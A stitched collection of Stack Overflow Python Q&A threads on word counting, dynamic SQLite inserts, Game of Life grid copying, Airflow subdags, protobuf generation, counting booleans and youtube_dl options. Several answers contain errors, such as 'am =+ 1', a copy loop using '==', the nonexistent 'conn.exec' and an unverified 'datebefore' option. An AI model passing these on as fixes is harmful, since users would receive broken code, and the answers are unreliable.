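For the list-deletion question above, if the index list is not already ascending, sort it by value in descending order before popping so earlier removals cannot shift later targets; the data is made up:

items = ["a", "b", "c", "d", "e", "f"]
to_drop = [4, 1]                            # positions, in any order

for idx in sorted(to_drop, reverse=True):   # pop from the back first
    items.pop(idx)

print(items)  # ['a', 'c', 'd', 'f']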
Q: How to print multiple words in my program? I have this program that reads a file and prints the desired amount of most common words. I don't know how to print the words that appear the same amount of times. Here's my code: number_of_words = int(input('Enter how many top words you want to see: ')) uniques = [] stop_words = ["a", "an", "and", "in", "is"] for word in words: check_special = False if word.isalnum(): check_special = True if word not in uniques and word not in stop_words and check_special: uniques.append(word) counts = [] for unique in uniques: count = 0 for word in words: if word == unique: count += 1 counts.append((count, unique)) counts.sort() counts.reverse() for i in range(min(number_of_words, len(counts))): count, word = counts[i] print('The following words appeared %d each: %s ' % (count, word)) As a demo it prints: The following words appeared 11 each: night The following words appeared 11 each: go I want the output to be: The following words appeared 11 each: go, night How can I achieve this? A: We can achieve by using this. count_with_word = {} for i in range(min(number_of_words, len(counts))): count, word = counts[i] if count in count_with_word: count_with_word[count].append(word) else: count_with_word[count] = [word] for count, words in count_with_word.items(): print('The following words appeared %d each: %s ' % (count, ', '.join(words))) Output would be like: The following words appeared 2 each: t1, t2 A: Use dict counts_dict = {count: [] for count, word in counts} for count, word in counts: counts_dict[count].append(word) count_num_word = 0 for count in counts_dict: if count_num_word >= number_of_words: break print('The following words appeared %d each: %s ' % (count, ', '.join(counts_dict[count]))) count_num_word += len(counts_dict[count]) e.g. words = ['B', 'B', 'A', 'A', 'C'] > Enter how many top words you want to see: 3 > The following words appeared 2 each: B, A > The following words appeared 1 each: C > Enter how many top words you want to see: 2 > The following words appeared 2 each: B, A > Enter how many top words you want to see: 1 > The following words appeared 2 each: B, A Although you input number_of_words as 1, it should return all words that share the same count, as shown in the example.
How to print multiple words in my program?
I have this program that reads a file and prints the desired amount of most common words. I don't know how to print the words that appear the same amount of times. Here's my code: number_of_words = int(input('Enter how many top words you want to see: ')) uniques = [] stop_words = ["a", "an", "and", "in", "is"] for word in words: check_special = False if word.isalnum(): check_special = True if word not in uniques and word not in stop_words and check_special: uniques.append(word) counts = [] for unique in uniques: count = 0 for word in words: if word == unique: count += 1 counts.append((count, unique)) counts.sort() counts.reverse() for i in range(min(number_of_words, len(counts))): count, word = counts[i] print('The following words appeared %d each: %s ' % (count, word)) As a demo it prints: The following words appeared 11 each: night The following words appeared 11 each: go I want the output to be: The following words appeared 11 each: go, night How can I achieve this?
[ "We can achieve by using this.\ncount_with_word = {}\nfor i in range(min(number_of_words, len(counts))):\n count, word = counts[i]\n if count in count_with_word:\n count_with_word[count].append(word)\n else:\n count_with_word[count] = [word]\n\nfor count, words in count_with_word.items():\n print('The following words appeared %d each: %s ' % (count, ', '.join(words)))\n\nOutput would be like:\nThe following words appeared 2 each: t1, t2\n", "Use dict\ncounts_dict = {count: [] for count, word in counts}\nfor count, word in counts:\n counts_dict[count].append(word)\n\ncount_num_word = 0\nfor count in counts_dict:\n if count_num_word >= number_of_words:\n break\n print('The following words appeared %d each: %s ' % (count, ', '.join(counts_dict[count])))\n count_num_word += len(counts_dict[count])\n\ne.g.\nwords = ['B', 'B', 'A', 'A', 'C']\n\n> Enter how many top words you want to see: 3\n> The following words appeared 2 each: B, A \n> The following words appeared 1 each: C \n\n> Enter how many top words you want to see: 2\n> The following words appeared 2 each: B, A \n\n> Enter how many top words you want to see: 1\n> The following words appeared 2 each: B, A \n\nAlthough you input number_of_words as 1, it should return all words that share the same count, as shown in the example.\n" ]
[ 1, 0 ]
[]
[]
[ "python", "python_3.x" ]
stackoverflow_0074575523_python_python_3.x.txt
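For the word-count question above, collections.Counter can replace the manual counting loops and makes grouping equal counts straightforward; the word list is just an example:

from collections import Counter

words = ["go", "night", "go", "night", "sun"]
by_count = {}
for word, count in Counter(words).most_common():
    by_count.setdefault(count, []).append(word)

for count, group in by_count.items():
    print('The following words appeared %d each: %s' % (count, ', '.join(group)))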
Q: Python Sqlite3 insert operation with a list of column names Normally, if i want to insert values into a table, i will do something like this (assuming that i know which columns that the values i want to insert belong to): conn = sqlite3.connect('mydatabase.db') conn.execute("INSERT INTO MYTABLE (ID,COLUMN1,COLUMN2)\ VALUES(?,?,?)",[myid,value1,value2]) But now i have a list of columns (the length of list may vary) and a list of values for each columns in the list. For example, if i have a table with 10 columns (Namely, column1, column2...,column10 etc). I have a list of columns that i want to update.Let's say [column3,column4]. And i have a list of values for those columns. [value for column3,value for column4]. How do i insert the values in the list to the individual columns that each belong? A: As far as I know the parameter list in conn.execute works only for values, so we have to use string formatting like this: import sqlite3 conn = sqlite3.connect(':memory:') conn.execute('CREATE TABLE t (a integer, b integer, c integer)') col_names = ['a', 'b', 'c'] values = [0, 1, 2] conn.execute('INSERT INTO t (%s, %s, %s) values(?,?,?)'%tuple(col_names), values) Please notice this is a very bad attempt since strings passed to the database shall always be checked for injection attack. However you could pass the list of column names to some injection function before insertion. EDITED: For variables with various length you could try something like exec_text = 'INSERT INTO t (' + ','.join(col_names) +') values(' + ','.join(['?'] * len(values)) + ')' conn.exec(exec_text, values) # as long as len(col_names) == len(values) A: Of course string formatting will work, you just need to be a bit cleverer about it. col_names = ','.join(col_list) col_spaces = ','.join(['?'] * len(col_list)) sql = 'INSERT INTO t (%s) values(%s)' % (col_list, col_spaces) conn.execute(sql, values) A: I was looking for a solution to create columns based on a list of unknown / variable length and found this question. However, I managed to find a nicer solution (for me anyway), that's also a bit more modern, so thought I'd include it in case it helps someone: import sqlite3 def create_sql_db(my_list): file = 'my_sql.db' table_name = 'table_1' init_col = 'id' col_type = 'TEXT' conn = sqlite3.connect(file) c = conn.cursor() # CREATE TABLE (IF IT DOESN'T ALREADY EXIST) c.execute('CREATE TABLE IF NOT EXISTS {tn} ({nf} {ft})'.format( tn=table_name, nf=init_col, ft=col_type)) # CREATE A COLUMN FOR EACH ITEM IN THE LIST for new_column in my_list: c.execute('ALTER TABLE {tn} ADD COLUMN "{cn}" {ct}'.format( tn=table_name, cn=new_column, ct=col_type)) conn.close() my_list = ["Col1", "Col2", "Col3"] create_sql_db(my_list) All my data is of the type text, so I just have a single variable "col_type" - but you could for example feed in a list of tuples (or a tuple of tuples, if that's what you're into): my_other_list = [("ColA", "TEXT"), ("ColB", "INTEGER"), ("ColC", "BLOB")] and change the CREATE A COLUMN step to: for tupl in my_other_list: new_column = tupl[0] # "ColA", "ColB", "ColC" col_type = tupl[1] # "TEXT", "INTEGER", "BLOB" c.execute('ALTER TABLE {tn} ADD COLUMN "{cn}" {ct}'.format( tn=table_name, cn=new_column, ct=col_type)) A: As a noob, I can't comment on the very succinct, updated solution @ron_g offered. 
While testing, though I had to frequently delete the sample database itself, so for any other noobs using this to test, I would advise adding in: c.execute('DROP TABLE IF EXISTS {tn}'.format( tn=table_name)) Prior the the 'CREATE TABLE ...' portion. It appears there are multiple instances of .format( tn=table_name ....) in both 'CREATE TABLE ...' and 'ALTER TABLE ...' so trying to figure out if it's possible to create a single instance (similar to, or including in, the def section).
Python Sqlite3 insert operation with a list of column names
Normally, if i want to insert values into a table, i will do something like this (assuming that i know which columns that the values i want to insert belong to): conn = sqlite3.connect('mydatabase.db') conn.execute("INSERT INTO MYTABLE (ID,COLUMN1,COLUMN2)\ VALUES(?,?,?)",[myid,value1,value2]) But now i have a list of columns (the length of list may vary) and a list of values for each columns in the list. For example, if i have a table with 10 columns (Namely, column1, column2...,column10 etc). I have a list of columns that i want to update.Let's say [column3,column4]. And i have a list of values for those columns. [value for column3,value for column4]. How do i insert the values in the list to the individual columns that each belong?
[ "As far as I know the parameter list in conn.execute works only for values, so we have to use string formatting like this:\nimport sqlite3\nconn = sqlite3.connect(':memory:')\nconn.execute('CREATE TABLE t (a integer, b integer, c integer)')\ncol_names = ['a', 'b', 'c']\nvalues = [0, 1, 2]\nconn.execute('INSERT INTO t (%s, %s, %s) values(?,?,?)'%tuple(col_names), values)\n\nPlease notice this is a very bad attempt since strings passed to the database shall always be checked for injection attack. However you could pass the list of column names to some injection function before insertion.\nEDITED:\nFor variables with various length you could try something like \nexec_text = 'INSERT INTO t (' + ','.join(col_names) +') values(' + ','.join(['?'] * len(values)) + ')'\nconn.exec(exec_text, values)\n# as long as len(col_names) == len(values)\n\n", "Of course string formatting will work, you just need to be a bit cleverer about it.\ncol_names = ','.join(col_list)\ncol_spaces = ','.join(['?'] * len(col_list))\nsql = 'INSERT INTO t (%s) values(%s)' % (col_list, col_spaces)\nconn.execute(sql, values)\n\n", "I was looking for a solution to create columns based on a list of unknown / variable length and found this question. However, I managed to find a nicer solution (for me anyway), that's also a bit more modern, so thought I'd include it in case it helps someone:\nimport sqlite3\n\ndef create_sql_db(my_list):\n\n file = 'my_sql.db'\n table_name = 'table_1'\n init_col = 'id'\n col_type = 'TEXT'\n\n conn = sqlite3.connect(file)\n c = conn.cursor()\n\n # CREATE TABLE (IF IT DOESN'T ALREADY EXIST)\n c.execute('CREATE TABLE IF NOT EXISTS {tn} ({nf} {ft})'.format(\n tn=table_name, nf=init_col, ft=col_type))\n\n # CREATE A COLUMN FOR EACH ITEM IN THE LIST\n for new_column in my_list:\n c.execute('ALTER TABLE {tn} ADD COLUMN \"{cn}\" {ct}'.format(\n tn=table_name, cn=new_column, ct=col_type))\n\n conn.close()\n\n\nmy_list = [\"Col1\", \"Col2\", \"Col3\"]\n\ncreate_sql_db(my_list)\n\nAll my data is of the type text, so I just have a single variable \"col_type\" - but you could for example feed in a list of tuples (or a tuple of tuples, if that's what you're into):\nmy_other_list = [(\"ColA\", \"TEXT\"), (\"ColB\", \"INTEGER\"), (\"ColC\", \"BLOB\")]\n\nand change the CREATE A COLUMN step to:\nfor tupl in my_other_list:\n\n new_column = tupl[0] # \"ColA\", \"ColB\", \"ColC\"\n col_type = tupl[1] # \"TEXT\", \"INTEGER\", \"BLOB\"\n\n c.execute('ALTER TABLE {tn} ADD COLUMN \"{cn}\" {ct}'.format(\n tn=table_name, cn=new_column, ct=col_type))\n\n", "As a noob, I can't comment on the very succinct, updated solution @ron_g offered. While testing, though I had to frequently delete the sample database itself, so for any other noobs using this to test, I would advise adding in:\n c.execute('DROP TABLE IF EXISTS {tn}'.format(\n tn=table_name))\n\nPrior the the 'CREATE TABLE ...' portion.\nIt appears there are multiple instances of\n.format(\n tn=table_name ....)\n\nin both 'CREATE TABLE ...' and 'ALTER TABLE ...' so trying to figure out if it's possible to create a single instance (similar to, or including in, the def section).\n" ]
[ 4, 3, 1, 0 ]
[]
[]
[ "python", "python_2.7", "sqlite" ]
stackoverflow_0020044178_python_python_2.7_sqlite.txt
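As a companion to the answers above, here is a minimal runnable sketch of the placeholder-building idea; the in-memory database, table name and column names (mytable, column3, column4) are illustrative stand-ins rather than anything from the original schema, and the column list is assumed to come from a trusted whitelist since column names cannot be bound as SQL parameters.

import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE mytable (id INTEGER, column3 TEXT, column4 TEXT)')

cols = ['column3', 'column4']                      # columns chosen at runtime
vals = ['value for column3', 'value for column4']  # matching values, same length

# Column names are joined into the SQL text (whitelisted); the values still go through ? placeholders.
sql = 'INSERT INTO mytable ({}) VALUES ({})'.format(
    ','.join(cols), ','.join('?' * len(cols)))
conn.execute(sql, vals)
conn.commit()

print(conn.execute('SELECT * FROM mytable').fetchall())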
Q: I have a problem with my "Game of life" on python I don't know why but my "def" that checks 3 rules of "Game of live" doesn't work correctly. I have 2 lists that contains 0 and some 1 to check the program. 3 points that should give this image but instead it gives this def upd(mass,screen,WHITE,mass1): BLACK = (0,0,0) for i in range(len(mass)-1): for j in range(len(mass[i])-1): if mass[i][j] == 0: if near(mass,i,j) == True: mass1[i][j]=1 print("case1") if mass[i][j] == 1: if (near(mass,i,j)==False): mass1[i][j]=0 print("case 2") if (near(mass,i,j)==False): mass1[i][j]=0 print("case 3") for i in range(len(mass1)-1): for j in range(len(mass1[i])-1): if mass1[i][j] == 1: p.draw.rect(screen, (WHITE), Rect((j*10,i*10), (10,10))) else: p.draw.rect(screen, (BLACK), Rect((j*10,i*10), (10,10))) mass=mass1 def near(mass,i,j): counter = 0 if mass[i][j+1]==1: counter+=1 if mass[i][j-1]==1: counter+=1 if mass[i+1][j]==1: counter+=1 if mass[i-1][j]==1: counter+=1 if mass[i+1][j+1]==1: counter+=1 if mass[i-1][j+1]==1: counter+=1 if mass[i+1][j-1]==1: counter+=1 if mass[i-1][j-1] == 1: counter+=1 if counter<2 or counter == 0: return False if counter > 3: return False if counter == 3: return True log that repeats every circle I am not good in python so I think this code is quite scarry:) I'll be very grateful for any advice A: mass = mass1 does not copy the contents of the grid, it just puts a reference to mass1 in mass (actually only in the local variable mass in scope of upd). You must deep copy the grid: for i in range(len(mass1)): for j in range(len(mass1[i])): mass[i][j] == mass1[i][j]
I have a problem with my "Game of life" on python
I don't know why but my "def" that checks 3 rules of "Game of live" doesn't work correctly. I have 2 lists that contains 0 and some 1 to check the program. 3 points that should give this image but instead it gives this def upd(mass,screen,WHITE,mass1): BLACK = (0,0,0) for i in range(len(mass)-1): for j in range(len(mass[i])-1): if mass[i][j] == 0: if near(mass,i,j) == True: mass1[i][j]=1 print("case1") if mass[i][j] == 1: if (near(mass,i,j)==False): mass1[i][j]=0 print("case 2") if (near(mass,i,j)==False): mass1[i][j]=0 print("case 3") for i in range(len(mass1)-1): for j in range(len(mass1[i])-1): if mass1[i][j] == 1: p.draw.rect(screen, (WHITE), Rect((j*10,i*10), (10,10))) else: p.draw.rect(screen, (BLACK), Rect((j*10,i*10), (10,10))) mass=mass1 def near(mass,i,j): counter = 0 if mass[i][j+1]==1: counter+=1 if mass[i][j-1]==1: counter+=1 if mass[i+1][j]==1: counter+=1 if mass[i-1][j]==1: counter+=1 if mass[i+1][j+1]==1: counter+=1 if mass[i-1][j+1]==1: counter+=1 if mass[i+1][j-1]==1: counter+=1 if mass[i-1][j-1] == 1: counter+=1 if counter<2 or counter == 0: return False if counter > 3: return False if counter == 3: return True log that repeats every circle I am not good in python so I think this code is quite scarry:) I'll be very grateful for any advice
[ "mass = mass1 does not copy the contents of the grid, it just puts a reference to mass1 in mass (actually only in the local variable mass in scope of upd). You must deep copy the grid:\nfor i in range(len(mass1)):\n for j in range(len(mass1[i])):\n mass[i][j] == mass1[i][j]\n\n" ]
[ 0 ]
[]
[]
[ "pygame", "python" ]
stackoverflow_0074575332_pygame_python.txt
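The fix in the answer above boils down to copying element by element instead of rebinding the name; the tiny 3x3 grids below are made-up sample data (no pygame involved) just to show the difference, and copy.deepcopy is an equivalent shortcut.

import copy

mass = [[0, 0, 0],
        [1, 1, 1],
        [0, 0, 0]]
mass1 = [[0, 1, 0],
         [0, 1, 0],
         [0, 1, 0]]   # pretend this is the freshly computed next generation

# mass = mass1 would only rebind the local name; the caller's grid would stay stale.
# Copying cell by cell mutates the original grid in place:
for i in range(len(mass1)):
    for j in range(len(mass1[i])):
        mass[i][j] = mass1[i][j]

# A fresh, independent copy can also be taken in one call:
mass_next = copy.deepcopy(mass1)

print(mass)                                    # now matches mass1
print(mass_next is mass1, mass_next == mass1)  # False True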
Q: Airflow Subdag started but tasks within it not starting I have a situation and problem in my production airflow. Here it goes : There’s a dag with multiple subdags. when I trigger the dag, sub-dag got triggered and shows as in progress but the tasks inside it are not getting started. shows as blank for long time. When I try to render the pod spec, this error shows : Error rendering Kubernetes Pod Spec: Parent instance <TaskInstance at 0x7faaa5f48d60> is not bound to a Session; lazy load operation of attribute ‘dag_model’ cannot proceed (Background on this error at: http://sqlalche.me/e/13/bhk3) Apache Airflow : 2.2.3 python 3.x A: Yeah, sometimes this happens to me too. Maybe it is an Airflow bug, I don't know. What I do instead is force the Subdag to trigger manually: After I do this once, the next DAG execution will run as expected. Edit: After some research, I found out this DAG parameter might be related is_paused_upon_creation, once it is set to false it should start the Subdag if this is the first time it ever runs. Look at the docs for more info
Airflow Subdag started but tasks within it not starting
I have a situation and a problem in my production Airflow. Here it goes: there’s a DAG with multiple subdags. When I trigger the DAG, the sub-DAG gets triggered and shows as in progress, but the tasks inside it are not getting started; it shows as blank for a long time. When I try to render the pod spec, this error shows: Error rendering Kubernetes Pod Spec: Parent instance <TaskInstance at 0x7faaa5f48d60> is not bound to a Session; lazy load operation of attribute ‘dag_model’ cannot proceed (Background on this error at: http://sqlalche.me/e/13/bhk3) Apache Airflow: 2.2.3, Python 3.x
[ "Yeah, sometimes this happens to me too. Maybe it is an Airflow bug, I don't know.\nWhat I do instead is force the Subdag to trigger manually:\n\nAfter I do this once, the next DAG execution will run as expected.\nEdit:\nAfter some research, I found out this DAG parameter might be related is_paused_upon_creation, once it is set to false it should start the Subdag if this is the first time it ever runs.\nLook at the docs for more info\n" ]
[ 0 ]
[]
[]
[ "airflow", "python" ]
stackoverflow_0073354932_airflow_python.txt
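For reference, a hedged sketch of where the is_paused_upon_creation flag mentioned in the answer is normally passed; the dag_id, schedule and single dummy task below are placeholders, not the production DAG from the question.

from datetime import datetime

from airflow import DAG
from airflow.operators.dummy import DummyOperator

with DAG(
    dag_id="parent_with_subdags",        # placeholder name
    start_date=datetime(2022, 1, 1),
    schedule_interval=None,
    catchup=False,
    is_paused_upon_creation=False,       # register the DAG unpaused so its first run gets scheduled
) as dag:
    start = DummyOperator(task_id="start")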
Q: protocol buffers in python: no classes generated My proto file is as follows: syntax = "proto3"; option csharp_namespace = "Proto"; message FileListRequest { repeated File Files = 1; } message File { string Path = 1; } message ImageFile { File File = 1; Size Size = 2; bytes Content = 3; } message Size { int32 Width = 1; int32 Height = 2; } message SendNextFile { } I compile it with the following command: protoc --proto_path=. -I . --python_out=..\..\python\Modules\PreloadingIteratorWrapper\ .\filelist.proto This creates the following file: # -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: filelist.proto """Generated protocol buffer code.""" from google.protobuf.internal import builder as _builder from google.protobuf import descriptor as _descriptor from google.protobuf import descriptor_pool as _descriptor_pool from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\x0e\x66ilelist.proto\"\'\n\x0f\x46ileListRequest\x12\x14\n\x05\x46iles\x18\x01 \x03(\x0b\x32\x05.File\"\x14\n\x04\x46ile\x12\x0c\n\x04Path\x18\x01 \x01(\t\"F\n\tImageFile\x12\x13\n\x04\x46ile\x18\x01 \x01(\x0b\x32\x05.File\x12\x13\n\x04Size\x18\x02 \x01(\x0b\x32\x05.Size\x12\x0f\n\x07\x43ontent\x18\x03 \x01(\x0c\"%\n\x04Size\x12\r\n\x05Width\x18\x01 \x01(\x05\x12\x0e\n\x06Height\x18\x02 \x01(\x05\"\x0e\n\x0cSendNextFileB\x08\xaa\x02\x05Protob\x06proto3') _builder.BuildMessageAndEnumDescriptors(DESCRIPTOR, globals()) _builder.BuildTopDescriptorsAndMessages(DESCRIPTOR, 'filelist_pb2', globals()) if _descriptor._USE_C_DESCRIPTORS == False: DESCRIPTOR._options = None DESCRIPTOR._serialized_options = b'\252\002\005Proto' _FILELISTREQUEST._serialized_start=18 _FILELISTREQUEST._serialized_end=57 _FILE._serialized_start=59 _FILE._serialized_end=79 _IMAGEFILE._serialized_start=81 _IMAGEFILE._serialized_end=151 _SIZE._serialized_start=153 _SIZE._serialized_end=190 _SENDNEXTFILE._serialized_start=192 _SENDNEXTFILE._serialized_end=206 # @@protoc_insertion_point(module_scope) According to the documentation this file should contain a class for each message type, but it doesn't. Why? A: Documentation says: Unlike when you generate Java and C++ protocol buffer code, the Python protocol buffer compiler doesn't generate your data access code for you directly. It means, that your .proto files won't be converted into some familiar accessors (no classes, no methods and no properties defined) Then, in docs, you see this: Instead (as you'll see if you look at addressbook_pb2.py) it generates special descriptors for all your messages, enums, and fields, and some mysteriously empty classes, one for each message type Which means: You'll see descriptors, parsed from serialized .proto file You'll see variables, named exactly the same as in .proto file But these "variables" are nothing but GeneratedProtocolMessageType class, which is a metaclass, but for protocol messages Then, you should look into docs for GeneratedProtocolMessageType from package google.protobuf.internal.python_message, where you should see this line: Metaclass for protocol message classes created at runtime from Descriptors. And this line means that you won't see any expected properties or methods while you code. Because these variables will become metaclasses for your protocol messages only at runtime! 
These metaclasses, at the time you look at the lines with their instantiation, are factories for your protocol messages Moreover, this behavior is mentioned in the middle of the docs for that class: The protocol compiler currently uses this metaclass to create protocol message classes at runtime. It works only that way: We add implementations for all methods described in the Message class. We also create properties to allow getting/setting all fields in the protocol message. Finally, we create slots to prevent users from accidentally "setting" nonexistent fields in the protocol message, which then wouldn't get serialized / deserialized properly. This metaclass generates classes for your protocol messages, described in .proto files, using descriptors from generated files. Only at runtime (not at coding time) And only at runtime you'll be able to use them as factories for your classes (those, which you expect to see in code) and, also, as a types for method parameters So there is nothing wrong with Google Protobuf Documentation, it is not outdated A: I have the same issue. Experimenting with grpc-tools (I found answer in another thread suggesting usage of this tool) I finally found a solution. Just add to protoc command this arg: --pyi_out like: protoc --proto_path=. -I . --python_out=..\..\python\Modules\PreloadingIteratorWrapper\ --pyi_out=python_out=..\..\python\Modules\PreloadingIteratorWrapper\ .\filelist.proto It will generate for you _bp2.py as well as corresponding _bp2.pyi (stub file). After that your IDE will see the class names, intellisense will work etc.
protocol buffers in python: no classes generated
My proto file is as follows: syntax = "proto3"; option csharp_namespace = "Proto"; message FileListRequest { repeated File Files = 1; } message File { string Path = 1; } message ImageFile { File File = 1; Size Size = 2; bytes Content = 3; } message Size { int32 Width = 1; int32 Height = 2; } message SendNextFile { } I compile it with the following command: protoc --proto_path=. -I . --python_out=..\..\python\Modules\PreloadingIteratorWrapper\ .\filelist.proto This creates the following file: # -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: filelist.proto """Generated protocol buffer code.""" from google.protobuf.internal import builder as _builder from google.protobuf import descriptor as _descriptor from google.protobuf import descriptor_pool as _descriptor_pool from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\x0e\x66ilelist.proto\"\'\n\x0f\x46ileListRequest\x12\x14\n\x05\x46iles\x18\x01 \x03(\x0b\x32\x05.File\"\x14\n\x04\x46ile\x12\x0c\n\x04Path\x18\x01 \x01(\t\"F\n\tImageFile\x12\x13\n\x04\x46ile\x18\x01 \x01(\x0b\x32\x05.File\x12\x13\n\x04Size\x18\x02 \x01(\x0b\x32\x05.Size\x12\x0f\n\x07\x43ontent\x18\x03 \x01(\x0c\"%\n\x04Size\x12\r\n\x05Width\x18\x01 \x01(\x05\x12\x0e\n\x06Height\x18\x02 \x01(\x05\"\x0e\n\x0cSendNextFileB\x08\xaa\x02\x05Protob\x06proto3') _builder.BuildMessageAndEnumDescriptors(DESCRIPTOR, globals()) _builder.BuildTopDescriptorsAndMessages(DESCRIPTOR, 'filelist_pb2', globals()) if _descriptor._USE_C_DESCRIPTORS == False: DESCRIPTOR._options = None DESCRIPTOR._serialized_options = b'\252\002\005Proto' _FILELISTREQUEST._serialized_start=18 _FILELISTREQUEST._serialized_end=57 _FILE._serialized_start=59 _FILE._serialized_end=79 _IMAGEFILE._serialized_start=81 _IMAGEFILE._serialized_end=151 _SIZE._serialized_start=153 _SIZE._serialized_end=190 _SENDNEXTFILE._serialized_start=192 _SENDNEXTFILE._serialized_end=206 # @@protoc_insertion_point(module_scope) According to the documentation this file should contain a class for each message type, but it doesn't. Why?
[ "Documentation says:\n\nUnlike when you generate Java and C++ protocol buffer code, the Python\nprotocol buffer compiler doesn't generate your data access code for\nyou directly.\n\nIt means, that your .proto files won't be converted into some familiar accessors (no classes, no methods and no properties defined)\nThen, in docs, you see this:\n\nInstead (as you'll see if you look at addressbook_pb2.py) it generates\nspecial descriptors for all your messages, enums, and fields, and some\nmysteriously empty classes, one for each message type\n\nWhich means:\n\nYou'll see descriptors, parsed from serialized .proto file\nYou'll see variables, named exactly the same as in .proto file\n\nBut these \"variables\" are nothing but GeneratedProtocolMessageType class, which is a metaclass, but for protocol messages\nThen, you should look into docs for GeneratedProtocolMessageType from package google.protobuf.internal.python_message, where you should see this line:\n\nMetaclass for protocol message classes created at runtime from\nDescriptors.\n\nAnd this line means that you won't see any expected properties or methods while you code. Because these variables will become metaclasses for your protocol messages only at runtime!\nThese metaclasses, at the time you look at the lines with their instantiation, are factories for your protocol messages\nMoreover, this behavior is mentioned in the middle of the docs for that class:\n\nThe protocol compiler currently uses this metaclass to create protocol\nmessage classes at runtime.\n\nIt works only that way:\n\nWe add implementations for all methods described in the Message class.\nWe also create properties to allow getting/setting all fields in the\nprotocol message. Finally, we create slots to prevent users from\naccidentally \"setting\" nonexistent fields in the protocol message,\nwhich then wouldn't get serialized / deserialized properly.\n\nThis metaclass generates classes for your protocol messages, described in .proto files, using descriptors from generated files. Only at runtime (not at coding time)\nAnd only at runtime you'll be able to use them as factories for your classes (those, which you expect to see in code) and, also, as a types for method parameters\nSo there is nothing wrong with Google Protobuf Documentation, it is not outdated\n", "I have the same issue. Experimenting with grpc-tools (I found answer in another thread suggesting usage of this tool) I finally found a solution.\nJust add to protoc command this arg: --pyi_out like:\nprotoc --proto_path=. -I . --python_out=..\\..\\python\\Modules\\PreloadingIteratorWrapper\\ --pyi_out=python_out=..\\..\\python\\Modules\\PreloadingIteratorWrapper\\ .\\filelist.proto\nIt will generate for you _bp2.py as well as corresponding _bp2.pyi (stub file). After that your IDE will see the class names, intellisense will work etc.\n" ]
[ 1, 0 ]
[]
[]
[ "protocol_buffers", "python" ]
stackoverflow_0071960226_protocol_buffers_python.txt
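To illustrate the runtime-generated classes described in the first answer, here is a small sketch that assumes the generated filelist_pb2 module from the question is importable (and, for the stub files from the second answer, a protoc recent enough to support --pyi_out); the file path and pixel sizes are invented sample data.

# shell: regenerate the module plus type stubs into the same output directory
#   protoc -I . --python_out=OUT_DIR --pyi_out=OUT_DIR filelist.proto

import filelist_pb2  # the generated module from the question

# The message classes exist at runtime even though no class bodies appear in the .py file.
msg = filelist_pb2.ImageFile()
msg.File.Path = "photos/cat.png"     # nested File message, sample value
msg.Size.Width = 640
msg.Size.Height = 480
msg.Content = b"raw image bytes"

data = msg.SerializeToString()                    # bytes ready for storage or transport
parsed = filelist_pb2.ImageFile.FromString(data)  # round-trip back into a message
print(parsed.File.Path, parsed.Size.Width, parsed.Size.Height)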
Q: Why is my count variable not calculating correct number of True values from the list? I have a list values_count which contains boolean values True and False. I am trying to calculate number of True values present in the list. For example , for the list ltr=[False,True,True,True] I expect my answer to be 3 but my answer comes 0, the initial value of the count variable that I have declared. Below is my code. class Solution(object): def count_true(self, values_count=[]): am = 0 for i in values_count: if values_count[i] == True: am + 1 return am else: pass if __name__ == '__main__': p = Solution() ltr = [False, True, True, True] print(p.count_true(ltr)) A: Actually, am + 1 should be am =+ 1 and return am should be at the last line. However, you can use my code below: def count_true(self, values_count=[]): count = 0 for value in values_count: if value: count += 1 return count Output: > 3 A: why not just ltr = [False, True, True, True] ltr.count(True)
Why is my count variable not calculating correct number of True values from the list?
I have a list values_count which contains boolean values True and False. I am trying to calculate number of True values present in the list. For example , for the list ltr=[False,True,True,True] I expect my answer to be 3 but my answer comes 0, the initial value of the count variable that I have declared. Below is my code. class Solution(object): def count_true(self, values_count=[]): am = 0 for i in values_count: if values_count[i] == True: am + 1 return am else: pass if __name__ == '__main__': p = Solution() ltr = [False, True, True, True] print(p.count_true(ltr))
[ "Actually, am + 1 should be am =+ 1 and return am should be at the last line.\nHowever, you can use my code below:\ndef count_true(self, values_count=[]):\n count = 0\n for value in values_count:\n if value:\n count += 1\n return count\n\nOutput:\n> 3\n\n", "why not just\nltr = [False, True, True, True]\nltr.count(True)\n\n" ]
[ 0, 0 ]
[]
[]
[ "for_loop", "list", "python" ]
stackoverflow_0074575802_for_loop_list_python.txt
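A few one-liners in the same spirit as the answers above; because True and False behave as 1 and 0, sum() counts the True entries directly.

ltr = [False, True, True, True]

print(ltr.count(True))            # 3 -- list.count, as in the second answer
print(sum(ltr))                   # 3 -- booleans are integers, so summing counts the Trues
print(sum(1 for v in ltr if v))   # 3 -- explicit generator form of the same count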
Q: How to incorporate options? I am new to web scraping but fortunately I am taking a class that gives us much of the framework needed for scraping certian API's. I want to change the options of which youtube videos I am extracting Info from but I am not sure how. ydl_opts = {'dump_single_json': True, 'writeautomaticsub': True, 'subtitleslangs': ['en']} with youtube_dl.YoutubeDL(ydl_opts) as ydl: result = ydl.extract_info("ytsearch100:iPhone 4", --datebefore 2012, download=False) I am getting an error for the --datebefore 2012 and I am not sure where/how this option should be incorporated A: I believe I have figured it out, but I am not 100% that the videos extracted are, in fact, within the specified date: ydl_opts = {'dump_single_json': True, 'writeautomaticsub': True, 'subtitleslangs': ['en'], 'datebefore': 2012}
How to incorporate options?
I am new to web scraping but fortunately I am taking a class that gives us much of the framework needed for scraping certain APIs. I want to change the options of which YouTube videos I am extracting info from but I am not sure how. ydl_opts = {'dump_single_json': True, 'writeautomaticsub': True, 'subtitleslangs': ['en']} with youtube_dl.YoutubeDL(ydl_opts) as ydl: result = ydl.extract_info("ytsearch100:iPhone 4", --datebefore 2012, download=False) I am getting an error for the --datebefore 2012 and I am not sure where/how this option should be incorporated
[ "I believe I have figured it out, but I am not 100% that the videos extracted are, in fact, within the specified date:\nydl_opts = {'dump_single_json': True, 'writeautomaticsub': True, 'subtitleslangs': ['en'], 'datebefore': 2012}\n\n" ]
[ 0 ]
[]
[]
[ "python", "youtube_dl" ]
stackoverflow_0074575883_python_youtube_dl.txt
